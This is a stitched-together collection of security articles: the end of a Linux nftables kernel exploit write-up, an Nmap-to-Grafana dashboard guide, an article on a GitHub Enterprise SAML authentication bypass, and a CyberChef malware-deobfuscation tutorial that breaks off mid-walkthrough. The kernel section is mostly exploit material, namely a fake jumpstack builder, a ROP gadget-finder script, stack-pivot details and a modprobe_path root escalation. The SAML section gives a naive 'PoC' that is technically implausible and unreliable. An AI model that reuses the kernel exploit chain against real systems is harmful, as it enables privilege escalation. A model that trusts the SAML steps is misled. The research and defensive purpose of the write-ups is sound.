	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);       // Get correct chain generation
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;          // Get fist and last rules in chain
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {   // 3. for each rule in chain
		nft_rule_dp_for_each_expr(expr, last, rule) {    // 4. for each expr in rule
			...
			expr_call_ops_eval(expr, &regs, pkt);    // 5. expr->ops->eval()

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}

		...
		break;
	}

	...
switch (regs.verdict.code) {
	case NFT_JUMP:
		/*
			1. If we're jumping to the next chain, store a pointer to the next rule of the 
      current chain in the jumpstack, increase the stack pointer and switch chain
		*/
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;	
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE:
	case NFT_RETURN:
		break;
	default:
		WARN_ON_ONCE(1);
	}
	/*
		2. If we got here then we completed the latest chain and can now evaluate
		the next rule in the previous one
	*/
	if (stackptr > 0) {
		stackptr--;
		chain = jumpstack[stackptr].chain;
		rule = jumpstack[stackptr].rule;
		last_rule = jumpstack[stackptr].last_rule;
		goto next_rule;
	}
		...

The first 8 jumps fall into case 1. where the NFT_JUMP verdict increases stackptr to align it with our controlled elements, then, on the 9th jump, we overwrite the 8th element containing the next rule and return from the current chain landing on the corrupted one. At 2. the stack pointer is decremented and control is returned to the previous chain.
Finally, the next rule in chain 8 gets dereferenced at 3: nft_rule_next(rule), too bad we just filled it with 0x42s, causing the protection fault.

2.2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule)	(struct nft_expr *)&rule->data[0]
#define nft_rule_expr_next(expr)	((void *)expr) + expr->ops->size
#define nft_rule_expr_last(rule)	(struct nft_expr *)&rule->data[rule->dlen]
#define nft_rule_next(rule)		(void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \
        for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \
             (expr) != (last); \
             (expr) = nft_rule_expr_next(expr))
  1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack we control as to reference valid memory.
  2. nft_rule_dp_for_each_expr thus calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can discard the result of nft_rule_expr_last(rule) since it won’t be dereferenced during the attack.
(remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data
$29 = 0x8
(remote) gef➤ p *(struct nft_expr *) rule->data
$30 = {
  ops = 0xffffffff82328780,
  data = 0xffff888003788a38 "1374\377\377\377"
}
(remote) gef➤ x/101 0xffffffff81a4fbdf
=> 0xffffffff81a4fbdf <nft_do_chain+143>:   cmp   r12,rbp
0xffffffff81a4fbe2 <nft_do_chain+146>:      jae   0xffffffff81a4feaf
0xffffffff81a4fbe8 <nft_do_chain+152>:      movz  eax,WORD PTR [r12]                  <== load rule into eax
0xffffffff81a4fbed <nft_do_chain+157>:      lea   rbx,[r12+0x8]                       <== load expr into rbx
0xffffffff81a4fbf2 <nft_do_chain+162>:      shr   ax,1
0xffffffff81a4fbf5 <nft_do_chain+165>:      and   eax,0xfff
0xffffffff81a4fbfa <nft_do_chain+170>:      lea   r13,[r12+rax*1+0x8]
0xffffffff81a4fbff <nft_do_chain+175>:      cmp   rbx,r13
0xffffffff81a4fc02 <nft_do_chain+178>:      jne   0xffffffff81a4fce5 <nft_do_chain+405>
0xffffffff81a4fc08 <nft_do_chain+184>:      jmp   0xffffffff81a4fed9 <nft_do_chain+905>

3. nft_do_chain calls expr->ops->eval(expr, regs, pkt); via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.

(remote) gef➤ x/4i 0xffffffff81a4fcdf
0xffffffff81a4fcdf <nft_do_chain+399>:      je    0xffffffff81a4feef <nft_do_chain+927>
0xffffffff81a4fce5 <nft_do_chain+405>:      mov   rax,QWORD PTR [rbx]                <== first QWORD at expr is expr->ops, store it into rax
0xffffffff81a4fce8 <nft_do_chain+408>:      cmp   rax,0xffffffff82328900 
=> 0xffffffff81a4fcee <nft_do_chain+414>:   jne   0xffffffff81a4fc0d <nft_do_chain+189>
(remote) gef➤ x/gx $rax
0xffffffff82328780 :    0xffffffff81a65410
(remote) gef➤ x/4i 0xffffffff81a65410
0xffffffff81a65410 <nft_immediate_eval>:    movzx eax,BYTE PTR [rdi+0x18]            <== first QWORD at expr->ops points to expr->ops->eval
0xffffffff81a65414 <nft_immediate_eval+4>:  movzx ecx,BYTE PTR [rdi+0x19]
0xffffffff81a65418 <nft_immediate_eval+8>:  mov   r8,rsi
0xffffffff81a6541b <nft_immediate_eval+11>: lea   rsi,[rdi+0x8]

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

  1. Setup a stack pivot payload to NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above. Remember that we had leaked the regs address.
  2. Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.
  3. Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.
  4. Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.
In fact, without this optimization, the required space would be:
8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes
Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

  • jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes
  • regs: 64 bytes (ROP chain) which will fit perfectly in the available space.

Here is how I crafted the fake jumpstack to achieve initial code execution:

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    /*
        align payload to rule
    */
    jumpstack.init = 'A';
    /*
        rule->expr will skip 8 bytes, here we basically point rule to itself + 8
    */
    jumpstack.rule =  regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;
    /*
        point expr to itself + 8 so that eval() will be the next pointer
    */
    jumpstack.expr = regs + 0x100;
    /*
        we're inside nft_do_chain and regs is declared in the same function,
        finding the offset should be trivial: 
        stack_pivot = &NFT_REG32_00 - RSP
        the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
    */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;
    unsigned char pad[31] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

2.2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offset. Out of laziness, I scripted my own gadget finder based on objdump, that would be useful for short relative pivots (rsp + small offset):

#!/bin/bash

objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
        ret_line_num=$((line_num + 7))
        if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
                out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
                if [[ ! $out == *"mov"* ]]; then
                        echo "$out"
                        echo -e "\n-----------------------------"
                fi
        fi
done

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47:    48 83 c4 30       add гsp, 0x30
ffffffff8104ba4b:    5b                pop rbx
ffffffff8104ba4c:    5d                pop rbp
ffffffff8104ba4d:    41 5c             pop r12
ffffffff8104ba4f:    41 5d             pop г13
ffffffff8104ba51:    41 5e             pop r14
ffffffff8104ba53:    41 5f             pop r15
ffffffff8104ba55:    e9 a6 78 fb 00    jmp ffffffff82003300 <____x86_return_thunk>

Even though it seems to be calling a jmp, gdb can confirm that we’re indeed returning to the saved rip via ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
0xffffffff8104ba47 <set_cpu_sibling_map+1255>:    add   rsp,0x30
0xffffffff8104ba4b <set_cpu_sibling_map+1259>:    pop   rbx
0xffffffff8104ba4c <set_cpu_sibling_map+1260>:    pop   rbp
0xffffffff8104ba4d <set_cpu_sibling_map+1261>:    pop   r12
0xffffffff8104ba4f <set_cpu_sibling_map+1263>:    pop   r13
0xffffffff8104ba51 <set_cpu_sibling_map+1265>:    pop   r14
0xffffffff8104ba53 <set_cpu_sibling_map+1267>:    pop   r15
0xffffffff8104ba55 <set_cpu_sibling_map+1269>:    ret

Of course, the script can be adjusted to look for different gadgets.

Now, as for the privesc itself, I went for the most convenient and simplest approach, that is overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just leave an in-depth analysis here:
We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following:

  1. pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.
  2. pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.
  3. mov qword ptr [rdi], rax; ret: Perform the copy operation.
  4. mov rsp, rbp; pop rbp; ret: Return to userland.

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.
In our case, since the ROP chain is running in the softirq context, I’m not sure if using the same method would have worked reliably, it’d probably just be better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=, state=)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state-state@entry=0xffffc90808083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=, pt_prev=, skb=) at net/core,
#8 ___netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in _netif_receive_skb_one_core (skb=, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in ___netif_receive_skb (skb=) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in ___napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
#14 net_rx_action (h=) at net/core/dev.c:6676
#15 0xffffffff82280135 in ___do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, a NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures and we quickly exit the program to disable the network interface connected to the new network namespace.
Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, this way we don’t have to worry about forcefully switching context.
As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory, this is crucial to bypass mitigations:

  • KPTI requires page tables to be swapped to the userland ones while switching context, __do_softirq will take care of that.
  • SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

2.3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and is never updated.

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the one in the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the whole kernel stack on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context as a new stack is allocated for those operations at a static address.

You can find the PoC with its kernel config on my Github profile. The exploit has purposefully been built with only a specific kernel version in mind, as to make it harder to use it for illicit purposes. Adapting it to another kernel would require the following steps:

  • Reshaping the kernel leak from the nft registers,
  • Finding the offsets of the new symbols,
  • Calculating the stack pivot length
  • etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts as the final result is something I am really proud of. I highly suggest anyone interested in kernel security and CTFs to spend some time auditing the Linux kernel to make our OSs more secure and also to have some fun!
I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes, please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here:

Nmap Dashboard with Grafana

Original text by hackertarget

Generate an Nmap Dashboard using Grafana and Dockerto get a clear overview of the network and open services.

This weekend’s project uses a similar technique to the previous Zeek Dashboard to build an easy to deploy dashboard solution for Nmap results. 

Building small deployments like this gives the operator a greater understanding of how the tools work, developing skills that can be used to implement custom solutions for your specific use cases.

Explore the Nmap Dashboard, and dig deeper into your network analysis.

Introduction to Nmap Visualisation

Nmap is a well known port scanner to find open network services. Not only finding open ports Nmap is able to identify services, operating system and much more. These insights allow you to develop a detailed picture of the network or system. When viewing a single host the standard Nmap output options are sufficient but when you are analysing multiple hosts and perhaps even the same host over time it becomes more difficult.

By parsing the Nmap XML and populating an SQLite database we can use a Grafana Dashboard to analyse the data.

A primary aim of these  mini projects is to demonstrate how combining open source tools and building simple data processing pipelines we can create elegant solutions with real world use cases. At the same time the analyst or administrator will build valuable skills integrating the tools.

Generating the SQLite Data Source

First up we need some Nmap results in XML format. You can run any 

nmap
 command with 
-oA myoutput
 to generate XML output. This generates output in all (A) forms including XML.

user@ubuntu:~$ sudo nmap -sV -F --script=http-title,ssl-cert -oA myoutput 10.0.0.0/24

This command will create a file 

myoutput.xml
. The two scripts we are using here (http-title / ssl-cert) are non-intrusive but can provide valuable insight into the service. The script and dashboard include queries to parse the results from these two scripts. It would be easy enough to extend the python script and dashboard queries to customise for a specific use case with other scripts such as Microsoft SMB or other protocols.

git clone https://github.com/hackertarget/nmap-did-what.git

To parse the 

myoutput.xml
 file and create the SQLite DB we will run the included python script.

user@ubuntu:~$ cp myoutput.xml nmap-did-what/data/
user@ubuntu:~$ cd nmap-did-what/data/
user@ubuntu:~/nmap-did-what/data$ python3 nmap-to-sqlite.py myoutput.xml
user@ubuntu:~/nmap-did-what/data$ ls
nmap_results.db myoutput.xml

The sequence of commands above generates the 

nmap_results.db
 from the XML. Running the script again on other Nmap XML will append to the database. So simply run it against any results you wish to analyse.

Note the 

nmap_results.db
 listed above, this is the 
sqlite
 database. The Grafana Dashboard is pre-configured with this DB as a data source and located in 
/data/
 in the container.

Grafana and Docker Compose

Now that we have our SQLite datasource with the Nmap data. We can start up the Grafana docker container and start our analysis.

Rather than install Grafana from scratch, this guide covers using docker to deploy a usable system in as little as a few minutes. The 

docker-compose
 config builds Grafana with a custom Nmap Dashboard and the SQLite data source installed.

user@ubuntu:~$ cd nmap-did-what/grafana-docker/
user@ubuntu:~/nmap-did-what/grafana-docker$ sudo docker-compose up -d
user@ubuntu:~/nmap-did-what/grafana-docker$ sudo docker ps -a
CONTAINER ID   IMAGE             COMMAND       CREATED         STATUS                      PORTS                                       NAMES
daba724a6548   grafana/grafana   "/run.sh"     1 hours ago    Up 1 hours                 0.0.0.0:3000->3000/tcp, :::3000->3000/tcp   grafana

If you wish to customise the build, simply review the 

docker-compose.yml
 file. The 
dashboards
 and 
data sources
directories contain the configuration information for the creation of the SQLite data source and the Nmap Dashboard within the newly created Grafana container. These files could be extend to build multiple dashboards or use other data sources.

Accessing Grafana and Nmap Dashboard

Grafana should now be running on its default port of 3000, so from your browser access https://127.0.0.1:3000 (or whichever IP you are running on).

The initial login will be admin/admin. This will need to be changed on first login. The authentication information and any changes to the Grafana configuration will be saved in the Grafana storage that was created with the 

docker-compose.yml
. The 
grafana-storage
 directory contains the running Grafana information. You can stop and start the docker container with changes being saved. If you remove this data the login credentials, and any changes to the Grafana configuration from the web console will be removed.

After accessing the Dashboard, the first thing you may need to change to see the data will be date range. Nmap data will be accessible and able to be filtered based on the date / time.

Using cron or a scheduled task you could run Nmap periodically and update the SQLite DB building a real time dashboard that displays your current network status and running services.

Conclusion

In this post, we explored the powerful combination of Nmap and Grafana for network monitoring and visualization. By leveraging Nmap’s network scanning and Grafana’s intuitive dashboard creation, we were able to get a detailed picture of our network, identify services and operating systems.

CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

GitHub, the world’s leading software development platform, has disclosed a critical security vulnerability (CVE-2024-4985) in its self-hosted GitHub Enterprise Server (GHES) product. The vulnerability, which carries a maximum severity rating of 10 on the Common Vulnerability Scoring System (CVSS), could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data.

GitHub Enterprise Server is the self-hosted version of GitHub Enterprise, tailored for businesses seeking a secure and customizable environment for source code management. Installed on an organization’s own servers or private cloud, it enables collaborative development while providing robust security and administrative controls.

The flaw resides in the optional encrypted assertions feature of GHES’s SAML single sign-on (SSO) authentication mechanism. This feature, designed to enhance security, ironically became a weak link when an attacker could forge a SAML response, impersonating a legitimate user and potentially gaining administrator privileges.

This vulnerability was discovered through GitHub’s Bug Bounty program, which rewards security researchers for identifying and reporting vulnerabilities.

It is important to note that the vulnerability only affects instances where SAML SSO is enabled with encrypted assertions, which are not activated by default. Therefore, organizations not using SAML SSO or those using SAML SSO without encrypted assertions are not impacted by this security flaw.

The primary danger posed by CVE-2024-4985 is the ability of an attacker to gain unauthorized access to GHES instances. By forging a SAML response, attackers can effectively bypass authentication mechanisms and provision accounts with site administrator privileges. For organizations utilizing the vulnerable configuration, the consequences of exploitation could be dire, including unauthorized access to source code, data breaches, and potential disruption of development operations.

GitHub has acted swiftly to address the issue, releasing patches for versions 3.9.153.10.123.11.10, and 3.12.4 of GHES. Administrators are strongly urged to update their installations immediately to mitigate the risk of compromise.

Technical vulnerability details:

The vulnerability exploits a vulnerability in the way GHES handles encrypted SAML claims. An attacker could create a fake SAML claim that contains correct user information. When GHES processes a fake SAML claim, it will not be able to validate its signature correctly, allowing an attacker to gain access to the GHES instance.

Poc: https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server

Steps:

  • Open your penetration tester.
  • Create a Web Connection Request.
  • Select the «GET» request type.
  • Enter your GHES URL.
  • Add a fake SAML Assertion parameter to your request. You can find an example of a fake SAML Assertion parameter in the GitHub documentation.
  • Check the GHES response.
  • If the response contains an HTTP status code of 200, it has successfully bypassed authentication using the fake SAML Assertion parameter.
  • If the response contains a different HTTP status code, it did not succeed in bypassing authentication.

Note: I’m going to synthesize an example using a dummy URL (https://your-ghes-instance.com). Be sure to replace it with your real GHES URL. In this example, we’ll assume that your GHES URL is https://your-ghes-instance.com. We’ll use a fake SAML Assertion parameter that looks like this:

<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>

Advanced CyberChef Techniques For Malware Analysis — Detailed Walkthrough and Examples

Advanced CyberChef Techniques For Malware Analysis - Detailed Walkthrough and Examples

Original by Matthew

We’re all used to the regular CyberChef operations like «From Base64», From Decimal and the occasional magic decode or xor. But what happens when we need to do something more advanced?

Cyberchef contains many advanced operations that are often ignored in favour of Python scripting. Few are aware of the more complex operations of which Cyberchef is capable. These include things like Flow Control, Registers and various Regular Expression capabilities. 

In this post. We will break down some of the more advanced CyberChef operations and how these can be applied to develop a configuration extractor for a multi-stage malware loader. 

Examples of Advanced Operations in CyberChef

Before we dive in, let’s look at a quick summary of the operations we will demonstrate. 

  • Registers 
  • Regular Expressions and Capture Groups
  • Flow Control Via Forking and Merging
  • Merging
  • Subtraction
  • AES Decryption

After demonstrating these individually to show the concepts, we will combine them all to develop a configuration extractor for a multi-stage malware sample.

Obtaining the Sample 

The sample demonstrated can be found on Malware Bazaar with

SHA256:<strong>befc7ebbea2d04c14e45bd52b1db9427afce022d7e2df331779dae3dfe85bfab</strong>

Advanced Operation 1 — Registers

Registers allow us to create variables within the CyberChef session and later reference them when needed. 

Registers are defined via a regular expression capture group and allow us to create a variable with an unknown value that fits a known pattern within the code. 

How To Use Registers in CyberChef

Below we have a Powershell script utilising AES decryption. 

Traditionally, this is easy to decode using CyberChef by manually copying out the key value and pasting it into an «AES Decrypt» Operation.

We can see the key copied into an AES Decrypt operation.

This method of manually copying out the key works effectively, however this means that the key is «hardcoded» and the recipe will not apply to similar samples using the same technique. 

If another sample utilises a different key, then this new key will need to be manually updated for the CyberChef recipe to work. 

Registers Example 1 

By utilising a «Register» operation, we can develop a regular expression to match the structure of the AES key and later access this via a register variable like 

$R0
to

The AES key, in this case, is a 44-character base64 string, hence we can use a base64 regular expression of 44-46 characters to extract the AES Key. 

We can later access this via the $R0 variable inside of the AES Decrypt operation.

Registers Example 2

In a previous stage of the same sample, the malware utilises a basic subtract operation to create ASCII char codes from an array of large integers.

Traditionally, this would be decoded by manually copying out the 787 value and applying this to a subtract operation. 

However, again, this causes issues if another sample utilises the same technique but with a different value. 

A better method is to create another register with a regular expression that matches the 787 value. 

Here we can see an example of this, where a Register has been used to locate and store the 787 value inside of $R0. This can later be referenced in a subtract operation by referencing $R0.

Regular Expressions

Regular expressions are frustrating, tedious and difficult to learn. But they are extremely powerful and you should absolutely learn them in order to improve your Cyberchef and malware analysis capability. 

In the development of this configuration extractor, regular expressions are applied in 10 separate operations. 

Regular Expressions — Use Case 1 (Registers)

The first use of regular expressions is inside of the initial register operation. 

Here, we have applied a regex to extract a key value used later as part of the deobfuscation process. 

The key use of regex here is to generically capture keys related to the decoding process, avoiding the need to hardcode values and allowing the recipe to work across multiple samples.

How To Use Regular Expressions to Isolate Text

The second use of regular expressions in this recipe is to isolate the main array of integers containing the second stage of the malware. 

The second stage is stored inside a large array of decimal values separated by commas and contained in round brackets. 

By specifying this inside of a regex, we can extract and isolate the large array and effectively ignore the rest of the code. This is in contrast to manually copying out the array and starting a new recipe.


A key benefit here is the ability to isolate portions of the code without needing to copy and paste. This enables you to continue working inside of the same recipe

Regular Expressions — Use Case 3 (Appending Values)

Occasionally you will need to append values to individual lines of output. 

In these cases, a regular expression can be utilised to capture an entire line 

(.*)
 and then replace it with the same value (via capture group referenced in $1) followed by another value (our initial register). 

The key use case is the ability to easily capture and append data, which is essential for operations like the subtract operator which will be later used in this recipe.

Regular Expressions — Use Case 4 (Extracting Encryption Keys)

We can utilise regular expressions inside of register operations to extract encryption keys and store these inside of variables. 

Here, we can see the 44-character AES key stored inside of the $R1 register. 

This is effective as the key is stored in a particular format across samples. Leveraging regex allows us to capture this format (44 char base64 inside single quotes) without needing to worry about the exact value.

Using Regular Expressions To Extract Base64 Text

Regular expressions can be used to isolate base64 text containing content of interest. 

This particular sample stores the final malware stage inside of a large AES Encrypted and Base64 encoded blob. 

Since we have already extracted the AES key via registers, we can apply the regex to isolate the primary base64 blob and later perform the AES Decryption.

Regular Expressions — Use Case 6 (Extracting Initial Characters)

This sample utilises the first 16 bytes of the base64 decoded content to create an IV for the AES decryption. 

We can leverage regular expressions and registers to extract out the first 16 bytes of the decoded content using 

.{16}

This enables us to capture the IV and later reference it via a register to perform the AES Decryption.

Using Regular Expressions To Remove Trailing Null-Bytes

Regular expressions can be used to remove trailing null bytes from the end of data. 

This is particularly useful as sometimes we only want to remove null bytes at the «end» of data. Whereas a traditional «remove null bytes» will remove null bytes everywhere in the code. 

In the sample here, there are trailing null bytes that are breaking a portion of the decryption process.

By applying a null byte search  

\0+$
 we can use a find/replace to remove these trailing null bytes. 

In this case, the 

\0+
 looks for one or more null bytes, and the 
$
 specifies that this must be at the end of the data.

After applying this operation, the trailing null bytes are now removed from the end of the data.

How To Use a Fork in CyberChef

Forking allows us to separate values and act on each independently as if they were a separate recipe. 

In the use case below, we have a large array of decimal values, and we need to subtract 787 from every single one. A major issue here is that in order to subtract 787, we need to append 787 after every single decimal value in the screenshot below. This would be a nightmare to do by hand.

As the data is structured and separated by commas, we can apply a forking operation with a split delimiter of commas and a merge delimiter of newlines. 

The split delimiter is whatever separates the values in your data, but the merge delimiter is how you want your new data structured.

At this point, every new line represents a new input data, and all future operations will act on each line independently.

If we now apply a find-replace operation, we can see that the operation has affected each line individually.

If we had applied the same concept without a fork, only a single 787 would have been added to the end of the entire blob of decimal data.

After applying the find/replace, we can continue to apply a subtraction operation and a «From Decimal». 

This reveals the decoded text and the next stage of the malware.

Note that the «Merge Delimiter» mentioned previously is purely a matter of formatting. 

Once you have decoded your content, as in the screenshot above, you will want to remove the merge delimiter to ensure that all the decoded content is together. 

We can see the full script after removing the merge delimiter.

How To Apply a Merge Operation in CyberChef

merge
 operation is essentially an «undo» for fork operations.

After successfully decoding content using a fork, you should apply a 

merge
 to ensure that the new content can be analysed appropriately. 

Without a merge, all future operations would affect only a single character and not the entire script.

Cyberchef is capable of AES Decryption via the AES Decrypt operation. 

To utilise AES decryption, look for the key indicators of AES inside of malware code and align all the variables with the AES operation. 

For example, align the Key, Mode, and IV. Then, plug these values into CyberChef.

Eventually, you can effectively automate this using Regular Expressions and Registers, as previously shown.

Configuration Extractor Walkthrough (22 Operations)

Utilising all of these techniques, we can develop a configuration extractor for a NetSupport Loader with 3 separate scripts that can all be decoded within the same recipe. 

This requires a total of 22 operations which will be demonstrated below.

The initial script is obfuscated using a large array of decimal integers. 

For each of these decimal values, the number 787 is subtracted and then the result is used as an ASCII charcode.

To decode this component, we must

  • Use a Register to extract the subtraction value
  • Use a Regular Expression to extract the decimal array
  • Use Forking to Separate each of the decimal values
  • Use a regular expression to append the 787 value stored in our register. 
  • Apply a Subtract operation to produce ASCII char codes
  • Apply a «From Decimal» to produce the 2nd stage
